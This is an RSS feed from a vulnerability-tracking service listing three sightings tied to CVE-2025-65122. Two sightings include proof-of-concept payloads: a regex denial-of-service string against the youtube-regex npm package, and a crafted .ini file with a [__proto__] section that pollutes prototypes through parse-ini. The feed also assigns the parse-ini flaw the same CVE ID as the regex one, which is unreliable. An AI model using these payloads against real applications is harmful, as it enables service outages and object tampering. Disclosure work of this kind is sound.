<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the 10 most recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 10 May 2026 09:45:28 +0000</lastBuildDate>
    <item>
      <title>f51c6e0c-c3cf-422a-9b0b-127a547f185a</title>
      <link>https://vulnerability.circl.lu/sighting/f51c6e0c-c3cf-422a-9b0b-127a547f185a/export</link>
      <description>{"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now() let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now() console.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"}</description>
      <content:encoded>{"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now() let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now() console.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/f51c6e0c-c3cf-422a-9b0b-127a547f185a/export</guid>
      <pubDate>Wed, 06 May 2026 19:39:33 +0000</pubDate>
    </item>
    <item>
      <title>8cff9b3e-fff3-4268-afc3-b66f3715107c</title>
      <link>https://vulnerability.circl.lu/sighting/8cff9b3e-fff3-4268-afc3-b66f3715107c/export</link>
      <description>{"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype  pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n&amp;gt;\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}</description>
      <content:encoded>{"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype  pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n&amp;gt;\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/8cff9b3e-fff3-4268-afc3-b66f3715107c/export</guid>
      <pubDate>Wed, 06 May 2026 19:46:52 +0000</pubDate>
    </item>
    <item>
      <title>2049ee5c-6aef-4b67-9903-6b6431e37df2</title>
      <link>https://vulnerability.circl.lu/sighting/2049ee5c-6aef-4b67-9903-6b6431e37df2/export</link>
      <description>{"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"}</description>
      <content:encoded>{"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/2049ee5c-6aef-4b67-9903-6b6431e37df2/export</guid>
      <pubDate>Thu, 07 May 2026 17:06:16 +0000</pubDate>
    </item>
  </channel>
</rss>
